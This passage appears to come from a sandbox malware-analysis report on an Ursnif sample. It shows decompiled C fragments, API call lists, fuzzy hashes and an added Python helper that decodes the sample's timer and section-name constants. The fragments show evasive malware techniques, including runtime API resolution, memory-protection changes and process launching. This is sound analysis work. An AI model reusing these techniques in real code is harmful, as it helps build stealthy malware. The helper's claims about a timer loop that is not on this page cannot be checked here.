                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61ADC
                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,05B86040,00000018,05B634DB,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000), ref: 05B61AF1
                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,05B86040,00000018,05B634DB,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000), ref: 05B61B1E
                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61B38
                          • GetLastError.KERNEL32(?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977,05B7893A,?,?), ref: 05B61B3F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                          • String ID:
                          • API String ID: 3676034644-0
                          • Opcode ID: 09ae4348f847886510f54e5b91fa5042bf99779851900ebeb550193dd756a22a
                          • Instruction ID: 8ee9c1d17e6381d1b35a869ecf9e8d5cad2aecdd20c0f18ddfb9a5277761f750
                          • Opcode Fuzzy Hash: 09ae4348f847886510f54e5b91fa5042bf99779851900ebeb550193dd756a22a
                          • Instruction Fuzzy Hash: 1B411B75900709AFDB31DFA4CC45EAABBF5FB04710F048555E662A71A0E738F805DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 74%
                          			E010076BB(intOrPtr __edx, void** _a4, void** _a8) {
                          				intOrPtr _v8;
                          				struct _FILETIME* _v12;
                          				short _v56;
                          				struct _FILETIME* _t12;
                          				intOrPtr _t13;
                          				void* _t17;
                          				void* _t21;
                          				intOrPtr _t27;
                          				long _t28;
                          				void* _t30;
                          
                          				_t27 = __edx;
                          				_t12 =  &_v12;
                          				GetSystemTimeAsFileTime(_t12);
                          				_push(0x192);
                          				_push(0x54d38000);
                          				_push(_v8);
                          				_push(_v12);
                          				L01008244();
                          				_push(_t12);
                          				_v12 = _t12;
                          				_t13 =  *0x100a348; // 0x428d5a8
                          				_t5 = _t13 + 0x100b87a; // 0x5298e22
                          				_t6 = _t13 + 0x100b594; // 0x530025
                          				_push(0x16);
                          				_push( &_v56);
                          				_v8 = _t27;
                          				L01007EAA();
                          				_t17 = CreateFileMappingW(0xffffffff, 0x100a34c, 4, 0, 0x1000,  &_v56); // executed
                          				_t30 = _t17;
                          				if(_t30 == 0) {
                          					_t28 = GetLastError();
                          				} else {
                          					if(GetLastError() == 0xb7) {
                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                          						if(_t21 == 0) {
                          							_t28 = GetLastError();
                          							if(_t28 != 0) {
                          								goto L6;
                          							}
                          						} else {
                          							 *_a4 = _t30;
                          							 *_a8 = _t21;
                          							_t28 = 0;
                          						}
                          					} else {
                          						_t28 = 2;
                          						L6:
                          						CloseHandle(_t30);
                          					}
                          				}
                          				return _t28;
			}

Instruction addresses (shown beside each line of the C-code above on the original page): 0x010076bb to 0x0100777d; 0x00000000 marks lines that have no instruction of their own.

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,01003DBA,?,?,4D283A53,?,?), ref: 010076C7
                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010076DD
                          • _snwprintf.NTDLL ref: 01007702
                          • CreateFileMappingW.KERNELBASE(000000FF,0100A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 0100771E
                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01003DBA,?,?,4D283A53,?), ref: 01007730
                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01007747
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,01003DBA,?,?,4D283A53), ref: 01007768
                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01003DBA,?,?,4D283A53,?), ref: 01007770
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                          • String ID:
                          • API String ID: 1814172918-0
                          • Opcode ID: 0b312f4717f6f840e2a76a3dd27ef504ccaf5b0db56d9f17decb2f9213904432
                          • Instruction ID: 101e2a860f9ca47f0725bff9cd479e853147794b4f89dcd6781055a51f4fdf74
                          • Opcode Fuzzy Hash: 0b312f4717f6f840e2a76a3dd27ef504ccaf5b0db56d9f17decb2f9213904432
                          • Instruction Fuzzy Hash: F821C376640204BFE723EB68CC09F9E3BA9BB44754F204061F68DE71D1DA75A905CB50
                          Uniqueness

                          Uniqueness Score: -1.00%
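Added analyst helper (not code from the sample, from Joe Sandbox, or from this report): it decodes the 64-bit time arithmetic in the two decompiled functions above, namely the 0x0000019254D38000 divisor that E010076BB applies to the GetSystemTimeAsFileTime value (the _aulldiv call) before formatting the CreateFileMappingW section name, and the 0xFFFFFFFFFF676980 / 0xFFFFFFFFDC3CBA00 multipliers (the _allmul calls) with which the waitable-timer loop builds its relative due times. The _snwprintf format string that turns the quotient into the section name lives in sample memory and is not on this page, so only the numeric seed and its validity window are reconstructed; every function and variable name below is the helper's own, and the sample timestamp in the usage block is constructed.

```python
"""
Decode the 64-bit time constants visible in the decompiled Ursnif listing.

Added analyst helper; not code from the sample or from Joe Sandbox.
Only the constants that appear in the listing are used:
  * _aulldiv(lo, hi, 0x54D38000, 0x192): FILETIME / 0x19254D38000
  * _allmul(count, 0, 0xFF676980, 0xFFFFFFFF) and
    _allmul(count, 0, 0xDC3CBA00, 0xFFFFFFFF): negative, i.e. relative,
    due times handed to SetWaitableTimer.
"""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
HUNDRED_NS_PER_SECOND = 10_000_000

# Constants exactly as pushed in the listing (low dword, high dword).
SEED_DIVISOR = (0x192 << 32) | 0x54D38000   # divisor passed to _aulldiv
TIMER_UNIT_1S = 0xFF676980                   # low dword; high dword is 0xFFFFFFFF
TIMER_UNIT_60S = 0xDC3CBA00                  # low dword; high dword is 0xFFFFFFFF


def to_signed64(lo: int, hi: int) -> int:
    """Assemble the two dwords pushed for _allmul into a signed 64-bit value."""
    value = ((hi & 0xFFFFFFFF) << 32) | (lo & 0xFFFFFFFF)
    return value - (1 << 64) if value & (1 << 63) else value


def datetime_to_filetime(when: datetime) -> int:
    """FILETIME as GetSystemTimeAsFileTime returns it: 100 ns ticks since 1601-01-01 UTC."""
    delta = when.astimezone(timezone.utc) - FILETIME_EPOCH
    seconds = delta.days * 86_400 + delta.seconds
    return seconds * HUNDRED_NS_PER_SECOND + delta.microseconds * 10


def section_name_seed(when: datetime) -> int:
    """Mirror of the _aulldiv call: the unsigned FILETIME divided by SEED_DIVISOR."""
    return datetime_to_filetime(when) // SEED_DIVISOR


def seed_window(seed: int):
    """UTC interval [start, end) during which section_name_seed() yields this seed."""
    start = FILETIME_EPOCH + timedelta(microseconds=seed * SEED_DIVISOR // 10)
    end = FILETIME_EPOCH + timedelta(microseconds=(seed + 1) * SEED_DIVISOR // 10)
    return start, end


def relative_due_time(count: int, unit_lo: int) -> int:
    """Mirror of _allmul(count, 0, unit_lo, 0xFFFFFFFF): count times a negative 100 ns unit."""
    return count * to_signed64(unit_lo, 0xFFFFFFFF)


def due_time_seconds(count: int, unit_lo: int) -> float:
    """Seconds the waitable timer will sleep; a negative due time means relative to now."""
    return -relative_due_time(count, unit_lo) / HUNDRED_NS_PER_SECOND


if __name__ == "__main__":
    period = timedelta(microseconds=SEED_DIVISOR // 10)
    print("seed divisor = %d x 100 ns = %s" % (SEED_DIVISOR, period))
    # Constructed sample timestamp; any UTC datetime works.
    sample_time = datetime(2022, 5, 24, 12, 0, tzinfo=timezone.utc)
    seed = section_name_seed(sample_time)
    start, end = seed_window(seed)
    print("seed 0x%x covers %s .. %s" % (seed, start, end))
    print("0xFF676980 unit = %.0f s, 0xDC3CBA00 unit = %.0f s" % (
        due_time_seconds(1, TIMER_UNIT_1S), due_time_seconds(1, TIMER_UNIT_60S)))
```

Running the helper shows that the divisor is exactly 1,728,000,000,000 ticks of 100 ns, i.e. 48 hours, so the seed fed into the section name is stable for two days and then increments, and that the two multipliers are -1 s and -60 s in 100 ns units: on the normal path SetWaitableTimer receives a relative due time of the global at 0x100a2e4 in seconds, and after the 0x10d2 status a due time of the global at 0x100a2e8 in minutes. Because each WaitForMultipleObjects call waits on the timer together with a second handle (the global at 0x100a30c in the first call), the sleep can be cut short: a return of 0 continues the loop, anything else falls through to the RtlFreeHeap cleanup at L12.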

Control-flow Graph

• Graph rendered on the original page (executed and not-executed blocks are colour-coded there): basic blocks 5b6c5c4 to 5b6c751, calling 5b7212c, 5b7ed07, 5b76de0, 5b614c6, 5b75220, 5b79048 and 5b636bb, with API nodes memset, WaitForSingleObject, SuspendThread and GetLastError.
                          APIs
                          • memset.NTDLL ref: 05B6C5E7
                            • Part of subcall function 05B7212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,05B6111D,00000000), ref: 05B7214D
                            • Part of subcall function 05B7212C: GetProcAddress.KERNEL32(00000000,?), ref: 05B72166
                            • Part of subcall function 05B7212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,05B6111D,00000000), ref: 05B72183
                            • Part of subcall function 05B7212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,05B6111D,00000000), ref: 05B72194
                            • Part of subcall function 05B7212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,05B6111D,00000000), ref: 05B721A7
                          • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 05B6C6A1
                          • WaitForSingleObject.KERNEL32(00000064), ref: 05B6C6AF
                          • SuspendThread.KERNEL32(00000004), ref: 05B6C6C2
                            • Part of subcall function 05B76DE0: memset.NTDLL ref: 05B770AA
                          • ResumeThread.KERNEL32(00000004), ref: 05B6C745
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                          • String ID: v
                          • API String ID: 2397206891-1801730948
                          • Opcode ID: 37202fd90aa6d99594bff3b41463b9cbca96c1f3223b2993f777e9945f60468a
                          • Instruction ID: d9a6ae32209b15d6f4085a2c094e2c02b8fec1544558a2f1f0a915c05843a6e8
                          • Opcode Fuzzy Hash: 37202fd90aa6d99594bff3b41463b9cbca96c1f3223b2993f777e9945f60468a
                          • Instruction Fuzzy Hash: 81418871A00208EFDB21AFA4CC89ABE7FAAFF04250F1444A5F99997150CB39FE51CB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 93%
                          			E01004274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                          				void* _t17;
                          				void* _t18;
                          				void* _t19;
                          				void* _t20;
                          				void* _t21;
                          				intOrPtr _t24;
                          				void* _t37;
                          				void* _t41;
                          				intOrPtr* _t45;
                          
                          				_t41 = __edi;
                          				_t37 = __ebx;
                          				_t45 = __eax;
                          				_t16 =  *((intOrPtr*)(__eax + 0x20));
                          				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                          					E01006E40(_t16, __ecx, 0xea60);
                          				}
                          				_t17 =  *(_t45 + 0x18);
                          				_push(_t37);
                          				_push(_t41);
                          				if(_t17 != 0) {
                          					InternetSetStatusCallback(_t17, 0);
                          					InternetCloseHandle( *(_t45 + 0x18)); // executed
                          				}
                          				_t18 =  *(_t45 + 0x14);
                          				if(_t18 != 0) {
                          					InternetSetStatusCallback(_t18, 0);
                          					InternetCloseHandle( *(_t45 + 0x14));
                          				}
                          				_t19 =  *(_t45 + 0x10);
                          				if(_t19 != 0) {
                          					InternetSetStatusCallback(_t19, 0);
                          					InternetCloseHandle( *(_t45 + 0x10)); // executed
                          				}
                          				_t20 =  *(_t45 + 0x1c);
                          				if(_t20 != 0) {
                          					FindCloseChangeNotification(_t20); // executed
                          				}
                          				_t21 =  *(_t45 + 0x20);
                          				if(_t21 != 0) {
                          					CloseHandle(_t21);
                          				}
                          				_t22 =  *((intOrPtr*)(_t45 + 8));
                          				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                          					E01006C2C(_t22);
                          					 *((intOrPtr*)(_t45 + 8)) = 0;
                          					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                          				}
                          				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                          				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                          					E01006C2C(_t23);
                          				}
                          				_t24 =  *_t45;
                          				if(_t24 != 0) {
                          					_t24 = E01006C2C(_t24);
                          				}
                          				_t46 =  *((intOrPtr*)(_t45 + 4));
                          				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                          					return E01006C2C(_t46);
                          				}
                          				return _t24;
			}

Instruction addresses (shown beside each line of the C-code above on the original page): 0x01004274 to 0x01004320; 0x00000000 marks lines that have no instruction of their own.

                          APIs
                          • InternetSetStatusCallback.WININET(?,00000000), ref: 010042A2
                          • InternetCloseHandle.WININET(?), ref: 010042A7
                          • InternetSetStatusCallback.WININET(?,00000000), ref: 010042B2
                          • InternetCloseHandle.WININET(?), ref: 010042B7
                          • InternetSetStatusCallback.WININET(?,00000000), ref: 010042C2
                          • InternetCloseHandle.WININET(?), ref: 010042C7
                          • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,01003801,?,?,76CC81D0,00000000,00000000), ref: 010042D7
                          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,01003801,?,?,76CC81D0,00000000,00000000), ref: 010042E1
                            • Part of subcall function 01006E40: WaitForMultipleObjects.KERNEL32(00000002,01007BB5,00000000,01007BB5,?,?,?,01007BB5,0000EA60), ref: 01006E5B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                          • String ID:
                          • API String ID: 2172891992-0
                          • Opcode ID: 6fe65229b05a25f7b0760698fff0db0367776f0449892cdc8d11664739a61815
                          • Instruction ID: 24be098855af3f977e89c6730ade559a90276bf8618115979772537c0f8fec1f
                          • Opcode Fuzzy Hash: 6fe65229b05a25f7b0760698fff0db0367776f0449892cdc8d11664739a61815
                          • Instruction Fuzzy Hash: 77117F766007489BE572AFBEEC84C5BBBEEEF442007950D58F6C5D3590C736F8848A64
                          Uniqueness

                          Uniqueness Score: -1.00%

                           Control-flow Graph
                           • (rendered graph not reproduced; legend: Executed / Not Executed; nodes 5b73959-5b73b8c)
                          APIs
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BB71
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?), ref: 05B7BBCC
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BBEF
                            • Part of subcall function 05B7BAD1: wcscpy.NTDLL ref: 05B7BC01
                          • WaitForSingleObject.KERNEL32(00000000,?,05FB9998,?,00000000,00000000,00000001), ref: 05B73A03
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B73A3D
                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 05B73A60
                          • RegCloseKey.ADVAPI32(?), ref: 05B73A69
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B73ACD
                          • RtlExitUserThread.NTDLL(?), ref: 05B73B03
                            • Part of subcall function 05B7A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,05B6148A,?,?,?), ref: 05B7A66F
                            • Part of subcall function 05B7A651: GetFileSize.KERNEL32(00000000,00000000,?,?,05B6148A,?,?,?), ref: 05B7A67F
                            • Part of subcall function 05B7A651: CloseHandle.KERNEL32(000000FF,?,?,05B6148A,?,?,?), ref: 05B7A6E1
                          • CreateProcessA.KERNEL32(?,?,?,76CDF750,?,?,?,?,?,?,?,?,76CDF750), ref: 05B73B5C
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                            • Part of subcall function 05B6F39B: GetLastError.KERNEL32 ref: 05B6F3E5
                            • Part of subcall function 05B6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                            • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                            • Part of subcall function 05B6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                            • Part of subcall function 05B6F39B: SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                            • Part of subcall function 05B6F39B: CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                          • String ID:
                          • API String ID: 3876914104-0
                          • Opcode ID: 182a7c851737fa924ccc5fdd128603f1531ea3b8b382f21deed2af20dab94ee6
                          • Instruction ID: 8cf50a8836c11694e164c84cb4bbb36e2d2630cc7677e594e3bb4dd251e87f5c
                          • Opcode Fuzzy Hash: 182a7c851737fa924ccc5fdd128603f1531ea3b8b382f21deed2af20dab94ee6
                          • Instruction Fuzzy Hash: A9613C71A10209AFDB10DFA4D886EBE7BFAFB09320F1554A6F625A7250DB30B941DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                           Control-flow Graph
                           • (rendered graph not reproduced; legend: Executed / Not Executed; nodes 5b68c35-5b68dc4)
                          APIs
                            • Part of subcall function 05B633A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 05B633CA
                            • Part of subcall function 05B633A5: GetLastError.KERNEL32(?,00000000), ref: 05B633D2
                            • Part of subcall function 05B633A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 05B633E9
                            • Part of subcall function 05B633A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 05B6340E
                          • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,05B860B0,0000001C,05B7BE61,00000002,?,00000001,80000000,05B89A20,80000000), ref: 05B68D90
                            • Part of subcall function 05B6A253: lstrlen.KERNEL32(?,?), ref: 05B6A28B
                            • Part of subcall function 05B6A253: lstrcpy.KERNEL32(00000000,?), ref: 05B6A2A2
                            • Part of subcall function 05B6A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 05B6A2AB
                            • Part of subcall function 05B6A253: GetModuleHandleA.KERNEL32(00000000), ref: 05B6A2C9
                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 05B68D0D
                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,05B860B0,0000001C,05B7BE61), ref: 05B68D28
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B68D4D
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B68D6B
                            • Part of subcall function 05B633A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 05B63417
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                          • String ID:
                          • API String ID: 899430048-3916222277
                          • Opcode ID: bdb473aea4fcf8aefb1c5f264d6ae407de71f0a5be212556a9857a33364a09e2
                          • Instruction ID: 22e936eaa31623e5929330dc89d8aa9c0b45e79a2e4649b78f0520372074cd7f
                          • Opcode Fuzzy Hash: bdb473aea4fcf8aefb1c5f264d6ae407de71f0a5be212556a9857a33364a09e2
                          • Instruction Fuzzy Hash: FF414971900619AFDB11DF68C84AAAEBBF5FF08310F148159F915AB290D778F950CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B761AE: GetProcAddress.KERNEL32(?,00000318), ref: 05B761D3
                            • Part of subcall function 05B761AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 05B761EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05B7561D
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05B75708
                            • Part of subcall function 05B761AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05B76359
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05B75653
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05B7565F
                          • lstrcmpi.KERNEL32(?,00000000), ref: 05B7569C
                          • StrChrA.SHLWAPI(?,0000002E), ref: 05B756A5
                          • lstrcmpi.KERNEL32(?,00000000), ref: 05B756B7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                          • String ID:
                          • API String ID: 3901270786-0
                          • Opcode ID: b2ac772e507aa90604aed8db26165174d8a66873ae8caeead81f6aa3b2c3a9e5
                          • Instruction ID: 16c208eb27646e67a0d2b68080357566c993cebd68099adb94b5fd57b402be03
                          • Opcode Fuzzy Hash: b2ac772e507aa90604aed8db26165174d8a66873ae8caeead81f6aa3b2c3a9e5
                          • Instruction Fuzzy Hash: 31315B71608319ABE7318E11CC44F2BBBE9FF84B54F100959F995A72C0D774F904CAAA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			E0100402A(void* __eax, void* __ecx) {
                          				long _v8;
                          				char _v12;
                          				void* _v16;
                          				void* _v28;
                          				long _v32;
                          				void _v104;
                          				char _v108;
                          				long _t36;
                          				intOrPtr _t40;
                          				intOrPtr _t47;
                          				intOrPtr _t50;
                          				void* _t58;
                          				void* _t68;
                          				intOrPtr* _t70;
                          				intOrPtr* _t71;
                          
                           				_t1 = __eax + 0x14; // 0x74183966
                           				_t69 =  *_t1;
                           				_t36 = E010044DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                           				_v8 = _t36;
                           				if(_t36 != 0) {
                           					L12:
                           					return _v8;
                           				}
                           				E01007A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                           				_t40 = _v12(_v12); // indirect call through the pointer filled in by E010044DE
                           				_v8 = _t40;
                           				if(_t40 == 0 && ( *0x100a300 & 0x00000001) != 0) { // only when bit 0 of the global flags word is set
                           					_v32 = 0; // _v32.._v20: 16-byte block (PROCESS_INFORMATION-sized) zeroed by the three stosd below
                           					asm("stosd");
                           					asm("stosd");
                           					asm("stosd");
                           					_v108 = 0;
                           					memset( &_v104, 0, 0x40); // _v108.._v40: 0x44 bytes = sizeof(STARTUPINFOA) on 32-bit
                           					_t47 =  *0x100a348; // 0x428d5a8
                           					_t18 = _t47 + 0x100b3f3; // 0x73797325 = "%sys", start of an environment-variable template string
                           					_t68 = E01007326(_t18); // expands it (ExpandEnvironmentStringsA, per the API list below)
                           					if(_t68 == 0) {
                           						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                           					} else {
                           						_t50 =  *0x100a348; // 0x428d5a8
                           						_t19 = _t50 + 0x100b73f; // 0x5298ce7 (export name string)
                           						_t20 = _t50 + 0x100b0af; // 0x4e52454b = "KERN", start of the module name string
                           						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19); // resolve a kernel32 export by name at runtime
                           						if(_t71 == 0) {
                           							_v8 = 0x7f; // ERROR_PROC_NOT_FOUND
                           						} else {
                           							_v108 = 0x44; // STARTUPINFOA.cb
                           							E010023AA();
                           							// argument layout (NULL, expanded string, ..., 0x04000000 = CREATE_DEFAULT_ERROR_MODE,
                           							// &STARTUPINFO, &PROCESS_INFORMATION) is consistent with CreateProcessA
                           							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                           							_push(1);
                           							E010023AA();
                           							if(_t58 == 0) {
                           								_v8 = GetLastError();
                           							} else {
                           								FindCloseChangeNotification(_v28); // executed; alias of CloseHandle, closes hThread
                           								CloseHandle(_v32); // closes hProcess
                           							}
                           						}
                           						HeapFree( *0x100a2d8, 0, _t68);
                           					}
                           				}
                           				_t70 = _v16;
                           				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                           				E01006C2C(_t70);
                           				goto L12;
                          			}

                          APIs
                            • Part of subcall function 010044DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01004046,?,?,?,?,00000000,00000000), ref: 01004503
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01004525
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0100453B
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01004551
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01004567
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0100457D
                          • memset.NTDLL ref: 01004094
                            • Part of subcall function 01007326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,010040AD,73797325), ref: 01007337
                            • Part of subcall function 01007326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01007351
                          • GetModuleHandleA.KERNEL32(4E52454B,05298CE7,73797325), ref: 010040CA
                          • GetProcAddress.KERNEL32(00000000), ref: 010040D1
                          • HeapFree.KERNEL32(00000000,00000000), ref: 01004139
                            • Part of subcall function 010023AA: GetProcAddress.KERNEL32(36776F57,01007989), ref: 010023C5
                          • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 01004116
                          • CloseHandle.KERNEL32(?), ref: 0100411B
                          • GetLastError.KERNEL32(00000001), ref: 0100411F
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                           • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
